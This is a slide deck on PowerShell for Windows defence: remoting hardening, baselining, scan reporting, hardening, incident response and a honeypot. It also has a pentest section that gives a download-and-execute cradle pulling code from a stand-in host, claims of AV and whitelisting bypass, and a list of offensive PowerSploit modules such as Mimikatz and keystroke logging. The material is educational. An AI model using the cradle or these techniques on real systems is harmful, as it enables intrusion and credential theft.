ben-finke
Standing on the Shoulders…
▪ Carlos Perez
▪ Matt Graeber
▪ Chris Campbell
▪ Matt Johnson
▪ Don Jones
▪ Lee Holmes
▪ Wolfgang Goerlich
▪ Rich Cassara
▪ Nick Jacob
▪ Ben Ten
▪ Ed Wilson
▪ Adam Driscoll
▪ And many, many more…
Powershell – The Beginning
▪ Built into Windows!
▪ Better than Batch and cmd.exe
▪ Objects, not text – you pipe structured objects instead of parsing text output
▪ Powershell Remoting
▪ Did I mention it's built into Windows?!
▪ Great documentation, code samples, communities
▪ Best tool for scripting and automating Windows
Levelset
▪ Cmdlet (pronounced "command-let")
▪ Functions
▪ Scripts
▪ Modules
▪ Object
▪ Method vs Property
▪ Variable
Cmdlet
▪ Not misspelled – a feature!
▪ Powershell commands – implement specific functionality
▪ Verb-Noun pattern
▪ Microsoft and Third-Party cmdlets available
▪ Written in a .NET language (typically C#)
▪ Get-Command – find the cmdlet you need
▪ Get-Help – learn how to call it (Get-Help <cmdlet> -Examples)
So, where do I write my awesome code?
▪ Powershell ISE
▪ Notepad++
▪ Sublime Text Editor 2
▪ Primal Script ($)
▪ Visual Studio ($ or Community)
▪ You’re totally going to need a Windows computer though…
Powershell ISE
▪ Integrated Scripting Environment
▪ Tab Expansion
▪ Module Search
▪ Context based Help
▪ Demo!
Powershell Remoting – A word of caution
▪ Windows Server 2012 and newer – remoting is on by default with an HTTP listener (TCP 5985)
▪ All others need to be configured (Enable-PSRemoting, once WMF is installed)
▪ Kerberos in AD; Basic and NTLM for workgroups (where you must also add the target to TrustedHosts)
▪ Use HTTPS when available! (needs a server certificate the clients trust, e.g. from a Windows CA) – Kerberos/NTLM already encrypt the payload over HTTP, but HTTPS adds server authentication and is the only safe way to use Basic
▪ CredSSP is an option (especially if you like having your plaintext credentials land in the remote host's LSASS, where they get dumped and replayed) – That was a joke, you don't.
▪ CredSSP exists for delegation and the "second hop"; if you must use it, scope DelegateComputer to named hosts, never *
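An added example, not from the slides, that does the checks above on a host: list the current WinRM listeners, add an HTTPS listener, turn off Basic, unencrypted traffic and CredSSP, then connect with -UseSSL. It assumes Windows PowerShell 3.0 or later, an elevated prompt, and a server-authentication certificate already in the machine store; the thumbprint and host name are placeholders.

```powershell
# Added example (not from the slides). Assumes PowerShell 3.0+, an elevated prompt,
# and a server-auth certificate already issued to this host by your CA.
$CertThumbprint = 'PLACEHOLDER_THUMBPRINT'   # placeholder: thumbprint of the cert in Cert:\LocalMachine\My

# 1. What is listening now? Server 2012+ ships with an HTTP listener on 5985 out of the box.
Get-ChildItem -Path WSMan:\localhost\Listener | ForEach-Object {
    $props = Get-ChildItem -Path $_.PSPath
    [pscustomobject]@{
        Transport = ($props | Where-Object Name -eq 'Transport').Value
        Port      = ($props | Where-Object Name -eq 'Port').Value
        Address   = ($props | Where-Object Name -eq 'Address').Value
    }
}

# 2. Add an HTTPS listener on 5986 bound to the certificate, and let it through the host firewall.
#    The certificate subject must match the name clients will connect to, hence the FQDN lookup.
$fqdn = [System.Net.Dns]::GetHostEntry($env:COMPUTERNAME).HostName
New-Item -Path WSMan:\localhost\Listener -Transport HTTPS -Address * -HostName $fqdn `
    -CertificateThumbPrint $CertThumbprint -Force | Out-Null
New-NetFirewallRule -DisplayName 'WinRM over HTTPS' -Direction Inbound -Protocol TCP `
    -LocalPort 5986 -Action Allow | Out-Null

# 3. Refuse the weak options: no Basic (password on the wire), no unencrypted sessions, no CredSSP.
Set-Item -Path WSMan:\localhost\Service\Auth\Basic        -Value $false
Set-Item -Path WSMan:\localhost\Service\AllowUnencrypted  -Value $false
Set-Item -Path WSMan:\localhost\Client\AllowUnencrypted   -Value $false
Disable-WSManCredSSP -Role Server
Disable-WSManCredSSP -Role Client
Get-WSManCredSSP     # should now report that CredSSP is not permitted in either role

# 4. From the client side, insist on TLS. -UseSSL fails closed if only the HTTP listener answers.
#    Enter-PSSession -ComputerName server01.corp.example -UseSSL     # placeholder host name
```

Once the HTTPS listener is verified from a client, the HTTP listener can be removed with Remove-Item under WSMan:\localhost\Listener, or left in place with AllowUnencrypted off so it still only carries Kerberos/NTLM-encrypted traffic.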
Powershell Discovery
▪ Incorporate useful information from other tools
– Nmap
– Nessus
▪ Pull info from AD directly
– Windows 2008 R2 – 76 cmdlets in the AD PS Module
– Windows 2012 – 135 cmdlets
– Windows 2012 R2 – 147 cmdlets
▪ Roll your own scanner with Powershell!
Baseline – Discovery, done repeatedly
▪ A lot of your discovery tasks will end up in your baseline
▪ Script up what you want to know
▪ Write it out in a diff-friendly text format (CSV, JSON)
▪ Stash it in a version-control repository
▪ Diff yesterday against today – what changed?
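An added example, not from the slides, that covers both the discovery and the baseline slides: it snapshots what a host exposes (listening ports with their owning process, auto-start services) and what AD knows about computers, writes the result as CSV, commits it, and diffs it against the previous snapshot. It assumes the ActiveDirectory module from RSAT, Windows 8/Server 2012 or later for Get-NetTCPConnection, and a git checkout at a directory of my choosing.

```powershell
# Added example (not from the slides). Assumes RSAT's ActiveDirectory module, Windows 8/2012+
# for Get-NetTCPConnection, and git on the PATH. $dir is an assumed repo location.

function Get-HostBaseline {
    # What this host exposes and what starts by itself; sorted so two runs diff cleanly.
    $listeners = Get-NetTCPConnection -State Listen |
        Sort-Object LocalAddress, LocalPort -Unique |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Type   = 'Listener'
                Name   = "$($_.LocalAddress):$($_.LocalPort)"
                Detail = $proc.ProcessName
            }
        }
    $services = Get-CimInstance -ClassName Win32_Service -Filter "StartMode='Auto'" |
        Sort-Object Name |
        ForEach-Object {
            [pscustomobject]@{ Type = 'Service'; Name = $_.Name; Detail = $_.PathName }
        }
    @($listeners) + @($services)
}

function Get-DomainComputerBaseline {
    # Every computer object in AD; a new row here is a new device (CSC 1). Volatile attributes
    # such as LastLogonDate are deliberately left out so they do not show up as daily noise.
    Get-ADComputer -Filter * -Properties OperatingSystem |
        Sort-Object Name |
        ForEach-Object {
            [pscustomobject]@{ Type = 'ADComputer'; Name = $_.Name; Detail = $_.OperatingSystem }
        }
}

function Compare-Baseline {
    param([string]$Previous, [string]$Current)
    # Rows present on only one side; '=>' means present today but not in the previous snapshot.
    Compare-Object -ReferenceObject (Import-Csv $Previous) -DifferenceObject (Import-Csv $Current) `
        -Property Type, Name, Detail |
        ForEach-Object {
            $change = if ($_.SideIndicator -eq '=>') { 'Added' } else { 'Removed' }
            [pscustomobject]@{ Change = $change; Type = $_.Type; Name = $_.Name; Detail = $_.Detail }
        }
}

# Daily run: find the most recent earlier snapshot, write today's, commit it, report the delta.
$dir   = 'C:\Baselines'                              # assumption: a git checkout lives here
$prior = Get-ChildItem -Path $dir -Filter 'baseline-*.csv' | Sort-Object Name | Select-Object -Last 1
$today = Join-Path $dir ('baseline-{0:yyyy-MM-dd}.csv' -f (Get-Date))

@(Get-HostBaseline) + @(Get-DomainComputerBaseline) | Export-Csv -Path $today -NoTypeInformation
git -C $dir add $today
git -C $dir commit -q -m "baseline $(Split-Path $today -Leaf)"

if ($prior) {
    Compare-Baseline -Previous $prior.FullName -Current $today | Format-Table -AutoSize
}
```

Run it from a scheduled task once a day; the commit history becomes the audit trail, and the Compare-Baseline output is the list of things that appeared or disappeared since the last run.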
Automate Reporting
▪ Need to nicely present Nessus or nmap output?
▪ Previous work – Carlos Perez (DarkOperator) – Posh-NVS
▪ https://github.com/darkoperator/Posh-NVS
▪ Powershell easily handles XML and CSV inputs
[xml]$report = Get-Content -Raw .\scan.nessus   # -Raw returns one string, so the [xml] cast sees a single document
$reporthosts = $report.NessusClientData_v2.Report.ReportHost
$reporthosts | ForEach-Object { $_.ReportItem } | Out-GridView
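An added example, not from the slides, that takes the same .nessus structure one step further: each ReportItem becomes a flat row with its host, port, severity name and plugin, filtered and exported to CSV for the report. The XML is a constructed two-host sample in the NessusClientData_v2 shape (plugin IDs and names are illustrative); point the Get-Content line at a real export instead.

```powershell
# Added example (not from the slides). The XML below is constructed sample data in the
# NessusClientData_v2 layout; swap in Get-Content -Raw .\scan.nessus for a real file.
$sample = @'
<NessusClientData_v2>
  <Report name="example">
    <ReportHost name="10.0.0.5">
      <ReportItem port="445" protocol="tcp" svc_name="cifs" severity="4" pluginID="97833"
                  pluginName="MS17-010: Security Update for Microsoft Windows SMB Server" />
      <ReportItem port="22" protocol="tcp" svc_name="ssh" severity="0" pluginID="10267"
                  pluginName="SSH Server Type and Version Information" />
    </ReportHost>
    <ReportHost name="10.0.0.9">
      <ReportItem port="3389" protocol="tcp" svc_name="msrdp" severity="2" pluginID="18405"
                  pluginName="Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness" />
    </ReportHost>
  </Report>
</NessusClientData_v2>
'@

$severityName = @{ '0' = 'Info'; '1' = 'Low'; '2' = 'Medium'; '3' = 'High'; '4' = 'Critical' }

function ConvertFrom-NessusXml {
    param([Parameter(Mandatory)][xml]$Report)
    # One row per finding. XML attributes come back as strings, so cast the ones you sort on.
    foreach ($h in $Report.NessusClientData_v2.Report.ReportHost) {
        foreach ($item in $h.ReportItem) {
            [pscustomobject]@{
                Host       = $h.name
                Port       = [int]$item.port
                Protocol   = $item.protocol
                Service    = $item.svc_name
                Severity   = [int]$item.severity
                Risk       = $severityName[[string]$item.severity]
                PluginID   = $item.pluginID
                PluginName = $item.pluginName
            }
        }
    }
}

[xml]$report = $sample            # real scan: [xml]$report = Get-Content -Raw .\scan.nessus
$findings = ConvertFrom-NessusXml -Report $report

# Drop the informational noise, worst first, and hand the rest to whoever writes the report.
$findings | Where-Object Severity -ge 1 |
    Sort-Object -Property @{ Expression = 'Severity'; Descending = $true }, Host |
    Export-Csv -Path .\findings.csv -NoTypeInformation

# Console summary: finding count per risk level, per host.
$findings | Group-Object Host | ForEach-Object {
    $byRisk = $_.Group | Group-Object Risk | ForEach-Object { "$($_.Name)=$($_.Count)" }
    '{0,-12} {1}' -f $_.Name, ($byRisk -join ', ')
}
```

Because every finding is an object, the same $findings variable feeds Out-GridView for a quick look, Export-Csv for the spreadsheet crowd, and Compare-Object against last month's export for a trend.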
System Hardening
▪ Use Powershell to:
– Enable Windows Firewall
– Enable windows update
– Disable Guest account
– Disable autoplay
– Install AV software
– Turn on User Account Control
– Disable Java in IE
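An added example, not from the slides, that applies several of the items above and reads them back so the run leaves evidence. It needs an elevated prompt; Set-NetFirewallProfile needs Windows 8/Server 2012 or later and Disable-LocalUser needs PowerShell 5.1. The registry paths and values are the documented policy keys. Installing AV and disabling Java in IE depend on your product and browser build and are not covered here.

```powershell
# Added example (not from the slides). Elevated prompt; Windows 8/2012+ for the firewall cmdlets,
# PowerShell 5.1 for Disable-LocalUser. EnableLUA changes take effect after a reboot.

function Set-RegistryPolicy {
    param([string]$Path, [string]$Name, [int]$Value)
    # Create the key if it is missing, then write a DWORD. Idempotent, so it can run daily.
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    Set-ItemProperty -Path $Path -Name $Name -Value $Value -Type DWord
}

# Firewall on for every profile, inbound blocked unless a rule allows it.
Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True -DefaultInboundAction Block

# Windows Update via policy: not disabled, automatic download and scheduled install (AUOptions 4).
$au = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'
Set-RegistryPolicy -Path $au -Name 'NoAutoUpdate' -Value 0
Set-RegistryPolicy -Path $au -Name 'AUOptions'    -Value 4

# Guest account off.
Disable-LocalUser -Name 'Guest'

# AutoPlay/AutoRun off for every drive type (0xFF), for the machine and the current user.
foreach ($hive in 'HKLM', 'HKCU') {
    Set-RegistryPolicy -Path "$($hive):\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" `
        -Name 'NoDriveTypeAutoRun' -Value 0xFF
}

# UAC on, with admins prompted for consent on the secure desktop.
$uac = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
Set-RegistryPolicy -Path $uac -Name 'EnableLUA'                  -Value 1
Set-RegistryPolicy -Path $uac -Name 'ConsentPromptBehaviorAdmin' -Value 2
Set-RegistryPolicy -Path $uac -Name 'PromptOnSecureDesktop'      -Value 1

# Read everything back: the output object is what goes into the baseline, not the side effects.
$explorer = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
[pscustomobject]@{
    FirewallAllOn = @(Get-NetFirewallProfile | Where-Object { $_.Enabled -ne 'True' }).Count -eq 0
    AutoUpdate    = (Get-ItemProperty -Path $au).AUOptions -eq 4
    GuestDisabled = -not (Get-LocalUser -Name 'Guest').Enabled
    AutoRunOff    = (Get-ItemProperty -Path $explorer).NoDriveTypeAutoRun -eq 0xFF
    UacEnabled    = (Get-ItemProperty -Path $uac).EnableLUA -eq 1
}
```

Wrapped in Invoke-Command, the same script runs against a list of hosts and the returned objects tell you which machines drifted from the standard.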
Incident Response
▪ Something bad (or maybe bad) is happening
▪ Identify source of unwanted activity
▪ Determine what is occurring
▪ Isolate and Contain
▪ Gather information from isolated system(s)
▪ After Action review
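An added example, not from the slides, that carries out the "isolate and contain" and "gather information" steps against one suspect host over remoting. Volatile data is collected first, then the host is put into default-deny both ways with the analyst workstation carved out so the session survives, and the action is logged for the after-action review. $Suspect and $IrHost are placeholders; the target needs Windows 8/Server 2012 or later for the NetSecurity, NetTCPIP and ScheduledTasks modules, and the analyst side needs PowerShell 4 for Get-FileHash.

```powershell
# Added example (not from the slides). Run as an admin of the suspect host. Collection runs
# BEFORE isolation so the outbound block cannot cut off the session doing the collecting.
param(
    [Parameter(Mandatory)][string]$Suspect,
    [Parameter(Mandatory)][string]$IrHost,          # analyst workstation that must keep access
    [string]$EvidenceRoot = 'C:\IR'                  # assumed local evidence folder
)

$caseDir = Join-Path $EvidenceRoot ('{0}-{1:yyyyMMdd-HHmm}' -f $Suspect, (Get-Date))
New-Item -ItemType Directory -Path $caseDir -Force | Out-Null
$session = New-PSSession -ComputerName $Suspect

# 1. Volatile state first: what runs, what it talks to, and what comes back after a reboot.
$triage = Invoke-Command -Session $session -ScriptBlock {
    [pscustomobject]@{
        Collected   = Get-Date
        Processes   = Get-CimInstance -ClassName Win32_Process |
                      Select-Object ProcessId, ParentProcessId, Name, CommandLine, CreationDate
        Connections = Get-NetTCPConnection -State Established |
                      Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess
        Tasks       = Get-ScheduledTask | Where-Object State -ne 'Disabled' | ForEach-Object {
                          [pscustomobject]@{
                              Task   = $_.TaskPath + $_.TaskName
                              Action = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
                          }
                      }
        RunKeys     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                      'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' |
                      ForEach-Object { Get-ItemProperty -Path $_ -ErrorAction SilentlyContinue }
        # 4624 property offsets: 5 = TargetUserName, 8 = LogonType, 18 = IpAddress.
        Logons      = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddDays(-1) } -MaxEvents 1000 |
                      Select-Object TimeCreated,
                          @{ n = 'Account';   e = { $_.Properties[5].Value } },
                          @{ n = 'LogonType'; e = { $_.Properties[8].Value } },
                          @{ n = 'Source';    e = { $_.Properties[18].Value } }
    }
}

$triagePath = Join-Path $caseDir 'triage.xml'
$triage | Export-Clixml -Path $triagePath          # keeps the object graph; Import-Clixml to analyse
Get-FileHash -Path $triagePath -Algorithm SHA256 |   # hash what you collected, when you collected it
    Out-File -FilePath (Join-Path $caseDir 'triage.sha256')

# 2. Contain: default-deny in and out, with the analyst host allowed so remoting keeps working.
Invoke-Command -Session $session -ArgumentList $IrHost -ScriptBlock {
    param($Analyst)
    New-NetFirewallRule -DisplayName 'IR-Analyst-In'  -Direction Inbound  -RemoteAddress $Analyst -Action Allow | Out-Null
    New-NetFirewallRule -DisplayName 'IR-Analyst-Out' -Direction Outbound -RemoteAddress $Analyst -Action Allow | Out-Null
    Set-NetFirewallProfile -All -DefaultInboundAction Block -DefaultOutboundAction Block
}
Remove-PSSession $session

# 3. Record who did what to which host, for the after-action review.
'{0:o} isolated {1}; analyst {2} retained; evidence in {3}' -f (Get-Date), $Suspect, $IrHost, $caseDir |
    Add-Content -Path (Join-Path $EvidenceRoot 'actions.log')
```

Order matters: if the firewall change went first and the analyst rule were wrong, you would lose both the session and the volatile evidence. Restoring the host later is the reverse: remove the two IR rules and set the default actions back.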
Build Your Own HoneyPot!
▪ Create cmdlet parameter binding
▪ Make sure you’re admin
▪ Build your whitelist
▪ Create a listening port
▪ Any connection – add source IP to firewall
▪ Log the action (for reporting and response)
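An added example, not from the slides, that follows the six steps above: a script with cmdlet-style parameter binding, an admin check, a whitelist, a TCP listener on a port nothing legitimate should touch, a firewall block for any other source that connects, and a CSV log of every hit. It needs an elevated PowerShell 3 or later on Windows 8/Server 2012 or later for New-NetFirewallRule; the port, whitelist addresses and log path are my choices.

```powershell
# Added example (not from the slides). Elevated PowerShell 3+, Windows 8/2012+ for the
# NetSecurity cmdlets. Port, whitelist and log path are assumed values; change to taste.
[CmdletBinding()]
param(
    [ValidateRange(1, 65535)][int]$Port = 2222,
    [string[]]$Whitelist = @('10.0.0.10', '127.0.0.1'),   # scanners and admins allowed to touch the port
    [string]$LogPath = 'C:\Honeypot\connections.csv'
)

# Firewall rules need admin; fail early rather than on the first attacker.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run from an elevated prompt: adding firewall rules requires administrator rights.'
}

function Write-HoneyLog {
    param([string]$SourceIp, [string]$Action)
    # Append one CSV row per event so the file can go straight into reporting or a SIEM pickup.
    New-Item -ItemType Directory -Path (Split-Path $LogPath) -Force | Out-Null
    [pscustomobject]@{ Time = Get-Date -Format o; Port = $Port; SourceIp = $SourceIp; Action = $Action } |
        Export-Csv -Path $LogPath -Append -NoTypeInformation
}

function Block-SourceIp {
    param([string]$SourceIp)
    # One rule per offender so each block can be reviewed and removed on its own.
    $name = "Honeypot-Block-$SourceIp"
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Inbound -RemoteAddress $SourceIp -Action Block | Out-Null
    }
}

$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, $Port)
$listener.Start()
Write-Verbose "Listening on TCP $Port; Ctrl+C to stop."
try {
    while ($true) {
        $client = $listener.AcceptTcpClient()                       # blocks until something connects
        $source = $client.Client.RemoteEndPoint.Address.IPAddressToString
        $client.Close()                                              # never answer; the connection itself is the signal
        if ($Whitelist -contains $source) {
            Write-HoneyLog -SourceIp $source -Action 'Allowed (whitelist)'
            continue
        }
        Block-SourceIp -SourceIp $source
        Write-HoneyLog -SourceIp $source -Action 'Blocked'
        Write-Warning "Blocked $source after it touched port $Port"
    }
}
finally {
    $listener.Stop()
}
```

Pick a port that your own scanners are whitelisted for or that they never probe, otherwise the first Nessus run blocks the scanner. Because the client is closed without a banner, a single SYN-plus-handshake from an internal scan is enough to trigger the block, which is the point: nobody should be connecting there at all.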
PoshSec
▪ A Powershell module designed for executing security tasks on Windows systems
▪ Started by Will Steele and Matt Johnson
▪ Github – PoshSec
▪ Blue Team Focused
▪ Provides the platform for scripting and automating your playbook
PoshSec Framework
▪ A framework for Powershell and PoshSec scripts for network management, security, and maintenance
▪ Graphical Framework
PoshSec
▪ Critical Security Controls
– (1) Inventory of Authorized and Unauthorized Devices
– (2) Inventory of Authorized and Unauthorized Software
– (11) Limitation and Control of Network Ports, Protocols, and Services
– (12) Controlled Use of Admin Privileges
– (16) Account Monitoring and Control
▪ Baselines
▪ Forensics
▪ Log Management
▪ Software Management
A few helpful hints
▪ Get a code repo – SVN/Git/TFS/whatever
▪ Centralized logging
▪ Prepare BEFORE the Incident
▪ Test your defenses
▪ Test your response
Attacker’s Advantage
“Attack him where he is unprepared, appear where you are not expected.”
-Sun Tzu
*Obligatory Art of War quote
So you’re on this pentest…
▪ You totally exploit that one thing.
▪ And then AV stops every. Single. Thing. You. Try.
▪ Time to Live off the Land!**
** Living off the Land – By Chris Campbell and Matt Graeber
Powershell as a Post Exploitation Tool
▪ Remember what we said about PowerShell already being on the system?
▪ Bypass AV and application whitelisting – powershell.exe is a signed Microsoft binary, and code pulled straight into memory never touches disk for AV to scan
▪ Control all aspects of a Windows system
▪ Easy to execute – the classic download cradle fetches a script over HTTP and runs it in memory:
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://evilsite.com/code.txt")
PowerSploit
▪ Github project - https://github.com/mattifestation/PowerSploit
▪ Started by Matt Graeber (@mattifestation)
▪ Powershell modules for pentesters
▪ Loads of PS goodness like:
• Invoke-Shellcode
• Find-AVSignature
• Invoke-TokenManipulation
• Invoke-Mimikatz
• Get-Keystrokes
• Get-TimedScreenshot
• Set-MasterBootRecord
• Set-CriticalProcess (BSoD)
• Invoke-Portscan
• Invoke-ReverseDnsLookup
• Get-PEHeader
• Get-DLLLoadPath
• And lots, lots more!
Seriously Bro, Powershell on a pentest?
▪ Yes, I am quite serious (and don’t call me Bro…)
▪ Ever hear of Deep Panda?
– ProTip: Do NOT search for "Deep Panda" on Google Images.
▪ Deep Panda – the APT, not the 80s Metal Band
▪ Maintained persistence with Powershell scripts as scheduled tasks
▪ Moral of the story : Good enough for Deep Panda, good enough for you!
Whatever you are writing, please remember…
▪ Your code will be written once – and read dozens of times.
▪ “accountName” is a way better variable than “a”
▪ Comments – use them!
▪ Think modular (or reusable)
▪ Error Catching
▪ Logging
▪ Documentation of your functions
▪ Code Repository
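An added example, not from the slides, of one small function written the way the list asks: comment-based help that Get-Help reads, a descriptive parameter with validation and pipeline support, try/catch around the call that can actually fail, and Write-Verbose for a trace you can turn on. It resolves account names to SIDs with the .NET NTAccount type; the account names in the usage line are placeholders.

```powershell
# Added example (not from the slides). Works on any Windows PowerShell 3+ box; the names
# passed in at the bottom are placeholders.
function Resolve-AccountSid {
    <#
    .SYNOPSIS
        Resolves one or more account names to their SIDs.
    .DESCRIPTION
        Wraps NTAccount.Translate so an unknown account yields a row with an Error column
        instead of stopping the pipeline. Feed it names from a group dump or a baseline CSV.
    .PARAMETER AccountName
        Account in DOMAIN\user, user@domain or plain user form. Accepts pipeline input.
    .EXAMPLE
        'Administrator', 'NT AUTHORITY\SYSTEM' | Resolve-AccountSid
    #>
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [ValidateNotNullOrEmpty()]
        [string[]]$AccountName
    )
    process {
        foreach ($name in $AccountName) {
            Write-Verbose "Resolving $name"
            try {
                $account = New-Object System.Security.Principal.NTAccount($name)
                $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
                [pscustomobject]@{ AccountName = $name; Sid = $sid.Value; Error = $null }
            }
            catch [System.Security.Principal.IdentityNotMappedException] {
                # Expected failure mode: record it and keep going with the rest of the input.
                [pscustomobject]@{ AccountName = $name; Sid = $null; Error = 'Account not found' }
            }
            catch {
                # Anything else (domain unreachable, etc.) is still reported, not swallowed.
                Write-Error "Failed to resolve '$name': $($_.Exception.Message)"
                [pscustomobject]@{ AccountName = $name; Sid = $null; Error = $_.Exception.Message }
            }
        }
    }
}

# Usage: pipeline input, verbose trace on, result exported for the report.
'Administrator', 'NT AUTHORITY\SYSTEM', 'no-such-user' | Resolve-AccountSid -Verbose |
    Export-Csv -Path .\account-sids.csv -NoTypeInformation
```

Get-Help Resolve-AccountSid -Full now documents the function with no extra work, and because every result is an object with the same shape, the error rows sort and filter alongside the successes instead of disappearing into the console.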